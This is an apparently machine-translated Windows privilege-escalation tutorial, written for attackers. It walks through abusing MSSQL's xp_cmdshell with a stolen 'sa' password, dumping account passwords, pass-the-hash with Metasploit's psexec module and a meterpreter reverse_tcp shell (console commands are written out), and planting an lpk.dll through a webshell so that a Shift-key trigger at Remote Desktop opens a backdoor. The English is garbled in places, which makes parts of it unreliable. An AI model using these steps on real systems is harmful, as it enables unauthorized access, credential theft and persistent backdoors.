(i), MSSQL rights
Prerequisites: Get the account password of the user SA with the highest privileges to the MSSQL database
MSSQL Default port: 1433
MSSQL highest privilege User: SA
Once the sa password is obtained, it is connected directly through the tool.
MSSQL comes with a xp_cmdshell used to execute the cmd command.
(b), Getpass rights
A tool to get a computer user account password
(iii), hash transfer intrusion MSF loading
Hash algorithm: How to encrypt windows passwords
MSF download:http://www.rapid7.com/products/metasploit/download.jsp
Use Kali demo below
MSF uses:
Msfconsole//Start terminal
Use Exploit/windows/smb/psexec//module
Show Options//View module options Properties
Set PAYLOAD windows/meterpreter/reverse_tcp//Set exploit vectors
Show targets//view the attack target properties of the module
Set Lhost//setting the native address
Set RHOST 192.168.0.254//Setting properties Destination host Address
Set Smbuser Administrators//settings property user
Set Smbpass XXX//Set properties ciphertext hash
How is the hash of the target host acquired? You can get the hash value by PWDUMP7 this tool.
Just copy the following paragraph.
Exploit//Start attack
Get current shell, execute command
(iv), LPK's right to raise
Trigger: The directory exists EXE file is executed, his feature is that every executable file to be loaded before the file, the Windows system is to determine whether the current file directory exists this file, if the directory exists under the file is executed, if not exist will execute the DLL under the System32 directory.
Startup scenario: 3389 Remote Desktop Connection starts (continuous shift, then press hot key)
Power scheme: Generate Lpk.dll, upload to file directory via Webshell, wait for administrator to trigger EXE program.
Run LPK setch This tool selection, 2 key start, at this time the 2 Key 3 key value is LPK sethc built-in fixed numbers, such as 65,66 corresponds to a and B.
Then click Build, upload the generated lpk.dll to any directory, and run any of these EXE files, Lpk.dll will be automatically replaced with the shift backdoor.
I have it generated in the software directory, and then click to run the software
Then connect remotely, press the SHIFT key five times, and the following prompt will appear
Then press the combination key at the same time (that is, where set 65, 66, corresponding to a, b), the following password box appears
Enter the password and you will get to the following interface!!!
can also be used to execute software, such as to open 3389, in the generation of Lpk.dll is selected
Generate Lpk.dll and then put it in any directory, remote is off before the software is executed
Then execute EXE software, hello find remote was opened.
Right of collection (ii)----Windows Service server right of access to the MSSQL, Getpass rights, the right to hash, lpk right to withdraw